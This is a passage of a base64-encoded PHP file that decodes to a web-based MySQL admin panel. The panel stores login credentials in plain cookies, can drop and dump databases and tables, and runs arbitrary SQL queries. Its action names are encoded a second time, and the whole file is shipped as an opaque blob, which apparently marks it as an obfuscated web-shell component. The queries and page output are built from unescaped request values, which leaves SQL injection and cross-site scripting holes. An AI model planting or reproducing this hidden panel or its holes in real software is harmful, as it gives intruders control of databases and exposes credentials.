b24gdmFsdWU9Ykc5bmIyNWZjM1ZpYldsMD5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxwYWRkaW5nPTUgY2VsbHNwYWNpbmc9MT5cbiI7DQoJZWNobyAiPHRyPjx0ZCBjbGFzcz1cIm5ld1wiPkhvc3RuYW1lIDwvdGQ+PHRkPiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9aG9zdG5hbWUgdmFsdWU9J2xvY2FsaG9zdCc+PC90ZD48L3RyPlxuIjsNCgllY2hvICI8dHI+PHRkIGNsYXNzPVwibmV3XCI+VXNlcm5hbWUgPC90ZD48dGQ+IDxpbnB1dCB0eXBlPXRleHQgbmFtZT11c2VybmFtZT48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjx0cj48dGQgY2xhc3M9XCJuZXdcIj5QYXNzd29yZCA8L3RkPjx0ZD4gPGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzd29yZD48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nRW50ZXInPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1yZXNldCB2YWx1ZT0nQ2xlYXInPjxicj5cbiI7DQoJZWNobyAiPC9mb3JtPlxuIjsNCgllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJZWNobyAiPC9jZW50ZXI+PC90ZD48L3RyPjwvdGFibGU+XG4iOw0KCWVjaG8gIjxwPjxociB3aWR0aD0zMDA+XG4iOw0KCWVjaG8gIjwvY2VudGVyPjwvdGQ+PC90cj48L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbG9nb25fc3VibWl0KCkgew0KCWdsb2JhbCAkdXNlcm5hbWUsICRwYXNzd29yZCwgJGhvc3RuYW1lICwkUEhQX1NFTEY7DQoJaWYoJGhvc3RuYW1lID09JycpDQoJCSRob3N0bmFtZSA9ICdsb2NhbGhvc3QnOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl91c2VybmFtZSIsICR1c2VybmFtZSApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIsICRwYXNzd29yZCApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIsICRob3N0bmFtZSApOw0KCWVjaG8gIjxNRVRBIEhUVFAtRVFVSVY9UmVmcmVzaCBDT05URU5UPScwOyBVUkw9JFBIUF9TRUxGP2FjdGlvbj1iR2x6ZEVSQ2N3PT0nPiI7DQp9DQoNCmZ1bmN0aW9uIGVjaG9RdWVyeVJlc3VsdCgpIHsNCglnbG9iYWwgJHF1ZXJ5U3RyLCAkZXJyTXNnOw0KCWlmKCAkZXJyTXNnID09ICIiICkgJGVyck1zZyA9ICJTdWNjZXNzIjsNCglpZiggJHF1ZXJ5U3RyICE9ICIiICkgew0KCQllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9NT5cbiI7DQoJCWVjaG8gIjx0cj48dGQ+UXVlcnk8L3RkPjx0ZD4kcXVlcnlTdHI8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8dHI+PHRkPlJlc3VsdDwvdGQ+PHRkPiRlcnJNc2c8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8L3RhYmxlPjxwPlxuIjsNCgl9DQp9DQoNCmZ1bmN0aW9uIGxpc3REYXRhYmFzZXMoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJFBIUF9TRUxGOw0KCWVjaG8gIjxoMT5EYXRhYmFzZXMgTGlzdDwvaDE+XG4iOw0KCWVjaG8gIjxmb3JtIGFjdGlvbj0nJFBIUF9TRUxGJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWNyZWF0ZURCPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9ZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBEYXRhYmFzZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGhyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz01PlxuIjsNCgkkcERCID0gbXlzcWxfbGlzdF9kYnMoICRteXNxbEhhbmRsZSApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBEQiApOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRkYm5hbWUgPSBteXNxbF9kYm5hbWUoICRwREIsICRpICk7DQoJCWVjaG8gIjx0cj5cbiI7DQoJCWVjaG8gIjx0ZD4kZGJuYW1lPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWxpc3RUYWJsZXMmZGJuYW1lPSRkYm5hbWUnPlRhYmxlczwvYT48L3RkPlxuIjsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcERCJmRibmFtZT0kZGJuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgRGF0YWJhc2UgXCckZGJuYW1lXCc/JylcIj5Ecm9wPC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kdW1wREImZGJuYW1lPSRkYm5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHVtcCBEYXRhYmFzZSBcJyRkYm5hbWVcJz8nKVwiPkR1bXA8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gY3JlYXRlRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2NyZWF0ZV9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbGlzdERhdGFiYXNlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2Ryb3BfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCWxpc3REYXRhYmFzZXMoKTsNCn0NCg0KZnVuY3Rpb24gbGlzdFRhYmxlcygpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkUEhQX1NFTEY7DQoJZWNobyAiPGgxPlRhYmxlcyBMaXN0PC9oMT5cbiI7DQoJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Y3JlYXRlVGFibGU+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9dGFibGVuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBUYWJsZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9cXVlcnk+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IHNpemU9MTIwIG5hbWU9cXVlcnlTdHI+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUXVlcnknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBUYWJsZSA9IG15c3FsX2xpc3RfdGFibGVzKCAkZGJuYW1lICk7DQoJaWYoICRwVGFibGUgPT0gMCApIHsNCgkJJG1zZyAgPSBteXNxbF9lcnJvcigpOw0KCQllY2hvICI8aDM+RXJyb3IgOiAkbXNnPC9oMz48cD5cbiI7DQoJCXJldHVybjsNCgl9DQoJJG51bSA9IG15c3FsX251bV9yb3dzKCAkcFRhYmxlICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJHRhYmxlbmFtZSA9IG15c3FsX3RhYmxlbmFtZSggJHBUYWJsZSwgJGkgKTsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiJHRhYmxlbmFtZVxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5EYXRhPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5Ecm9wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHVtcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0R1bXAgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5EdW1wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPiI7DQp9DQoNCmZ1bmN0aW9uIGNyZWF0ZVRhYmxlKCkgew0KDQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkNSRUFURSBUQUJMRSAkdGFibGVuYW1lICggbm8gSU5UICkiOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbXlzcWxfcXVlcnkoICRxdWVyeVN0ciwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJbGlzdFRhYmxlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wVGFibGUoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkRST1AgVEFCTEUgJHRhYmxlbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCglsaXN0VGFibGVzKCk7DQp9DQoNCmZ1bmN0aW9uIHZpZXdTY2hlbWEoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJZWNobyAiPGgxPlRhYmxlIFNjaGVtYTwvaDE+XG4iOw0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvUXVlcnlSZXN1bHQoKTsNCgllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWFkZEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRmllbGQ8L2E+IHwgXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5WaWV3IERhdGE8L2E+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgIlNIT1cgZmllbGRzIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+RmllbGQ8L3RoPlxuIjsNCgllY2hvICI8dGg+VHlwZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5OdWxsPC90aD5cbiI7DQoJZWNobyAiPHRoPktleTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5EZWZhdWx0PC90aD5cbiI7DQoJZWNobyAiPHRoPkV4dHJhPC90aD5cbiI7DQoJZWNobyAiPHRoIGNvbHNwYW49Mj5BY3Rpb248L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCg0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2FycmF5KCAkcFJlc3VsdCApOw0KCQllY2hvICI8dHI+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIkZpZWxkIl0uIjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIlR5cGUiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiTnVsbCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJLZXkiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiRGVmYXVsdCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJFeHRyYSJdLiI8L3RkPlxuIjsNCgkJJGZpZWxkbmFtZSA9ICRmaWVsZFsiRmllbGQiXTsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZWRpdEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJmZpZWxkbmFtZT0kZmllbGRuYW1lJz5FZGl0PC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kcm9wRmllbGQmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmZmllbGRuYW1lPSRmaWVsZG5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHJvcCBGaWVsZCBcJyRmaWVsZG5hbWVcJz8nKVwiPkRyb3A8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbWFuYWdlRmllbGQoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBGaWVsZDwvaDE+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aDE+RWRpdCBGaWVsZDwvaDE+XG4iOw0KCQkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCQkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCQkkZmllbGQgPSBteXNxbF9mZXRjaF9hcnJheSggJHBSZXN1bHQgKTsNCgkJCWlmKCAkZmllbGRbIkZpZWxkIl0gPT0gJGZpZWxkbmFtZSApIHsNCgkJCQkkZmllbGR0eXBlID0gJGZpZWxkWyJUeXBlIl07DQoJCQkJJGZpZWxka2V5ID0gJGZpZWxkWyJLZXkiXTsNCgkJCQkkZmllbGRleHRyYSA9ICRmaWVsZFsiRXh0cmEiXTsNCgkJCQkkZmllbGRudWxsID0gJGZpZWxkWyJOdWxsIl07DQoJCQkJJGZpZWxkZGVmYXVsdCA9ICRmaWVsZFsiRGVmYXVsdCJdOw0KCQkJCWJyZWFrOw0KCQkJfQ0KCQl9DQoNCgkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCWlmKCBzdHJwb3MoICRmaWVsZHR5cGUsICIoIiApICkgew0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCSR2YWx1ZWxpc3QgPSBzdHJ0b2soICIgKClcbiIgKTsNCgkJCX0gZWxzZSB7DQoJCQkJJE0gPSBzdHJ0b2soICIgKCwpXG4iICk7DQoJCQkJaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgIiwiICkgKQ0KCQkJCQkkRCA9IHN0cnRvayggIiAoLClcbiIgKTsNCgkJCX0NCgkJfQ0KCX0NCg0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JFBIUF9TRUxGPlxuIjsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1hZGRGaWVsZF9zdWJtaXQ+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9ZWRpdEZpZWxkX3N1Ym1pdD5cbiI7DQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPW9sZF9uYW1lIHZhbHVlPSRmaWVsZG5hbWU+XG4iOw0KCX0NCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1kYm5hbWUgdmFsdWU9JGRibmFtZT5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9dGFibGVuYW1lIHZhbHVlPSR0YWJsZW5hbWU+XG4iOw0KCWVjaG8gIjxoMz5OYW1lPC9oMz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBuYW1lPW5hbWUgdmFsdWU9JGZpZWxkbmFtZT48cD5cbiI7DQoJZWNobyAnDQoNCjxoMz5UeXBlPC9oMz4NCjxmb250IHNpemU9MiBjbGFzcz0ibmV3Ij4NCiogYE1cJyBpbmRpY2F0ZXMgdGhlIG1heGltdW0gZGlzcGxheSBzaXplLjxicj4NCiogYERcJyBhcHBsaWVzIHRvIGZsb2F0aW5nLXBvaW50IHR5cGVzIGFuZCBpbmRpY2F0ZXMgdGhlIG51bWJlciBvZiBkaWdpdHMgZm9sbG93aW5nIHRoZSBkZWNpbWFsIHBvaW50Ljxicj4NCjwvZm9udD4NCjx0YWJsZT4NCjx0cj4NCjx0aD5UeXBlPC90aD48dGg+Jm5ic3BNJm5ic3A8L3RoPjx0aD4mbmJzcEQmbmJzcDwvdGg+PHRoPnVuc2lnbmVkPC90aD48dGg+emVyb2ZpbGw8L3RoPjx0aD5iaW5hcnk8L3RoPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTllJTlQiICc7IGlmKCAkdHlwZSA9PSAidGlueWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElOWUlOVCAoLTEyOCB+IDEyNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iU01BTExJTlQiICc7IGlmKCAkdHlwZSA9PSAic21hbGxpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPlNNQUxMSU5UICgtMzI3NjggfiAzMjc2Nyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iTUVESVVNSU5UIiAnOyBpZiggJHR5cGUgPT0gIm1lZGl1bWludCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+TUVESVVNSU5UICgtODM4ODYwOCB+IDgzODg2MDcpPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IklOVCIgJzsgaWYoICR0eXBlID09ICJpbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPklOVCAoLTIxNDc0ODM2NDggfiAyMTQ3NDgzNjQ3KTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJCSUdJTlQiICc7IGlmKCAkdHlwZSA9PSAiYmlnaW50IiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5CSUdJTlQgKC05MjIzMzcyMDM2ODU0Nzc1ODA4IH4gOTIyMzM3MjAzNjg1NDc3NTgwNyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iRkxPQVQiICc7IGlmKCAkdHlwZSA9PSAiZmxvYXQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkZMT0FUPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IkRPVUJMRSIgJzsgaWYoICR0eXBlID09ICJkb3VibGUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRPVUJMRTwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPk88L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQ+PGlucHV0IHR5cGU9cmFkaW8gbmFtZT10eXBlIHZhbHVlPSJERUNJTUFMIiAnOyBpZiggJHR5cGUgPT0gImRlY2ltYWwiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRFQ0lNQUwoTlVNRVJJQyk8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkIGFsaWduPWNlbnRlcj5PPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURSIgJzsgaWYoICR0eXBlID09ICJkYXRlIiApIGVjaG8gImNoZWNrZWQiO2VjaG8gJz5EQVRFICgxMDAwLTAxLTAxIH4gOTk5OS0xMi0zMSwgWVlZWS1NTS1ERCk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iREFURVRJTUUiICc7IGlmKCAkdHlwZSA9PSAiZGF0ZXRpbWUiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPkRBVEVUSU1FICgxMDAwLTAxLTAxIDAwOjAwOjAwIH4gOTk5OS0xMi0zMSAyMzo1OTo1OSwgWVlZWS1NTS1ERCBISDpNTTpTUyk8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPjxpbnB1dCB0eXBlPXJhZGlvIG5hbWU9dHlwZSB2YWx1ZT0iVElNRVNUQU1QIiAnOyBpZiggJHR5cGUgPT0gInRpbWVzdGFtcCIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRVNUQU1QICgxOTcwLTAxLTAxIDAwOjAwOjAwIH4gMjEwNi4uLiwgWVlZWU1NRERbSEhbTU1bU1NdXV0pPC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+TzwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IlRJTUUiICc7IGlmKCAkdHlwZSA9PSAidGltZSIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+VElNRSAoLTgzODo1OTo1OSB+IDgzODo1OTo1OSwgSEg6TU06U1MpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPC90cj4NCjx0cj4NCjx0ZD48aW5wdXQgdHlwZT1yYWRpbyBuYW1lPXR5cGUgdmFsdWU9IllFQVIiICc7IGlmKCAkdHlwZSA9PSAieWVhciIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+WUVBUiAoMTkwMSB+IDIxNTUsIDAwMDAsIFlZWVkpPC90ZD4NCjx0ZD4mbmJzcDwvdGQ+DQo8dGQ+Jm5ic3A8L3RkPg0KPHRkPiZuYnNwPC90ZD4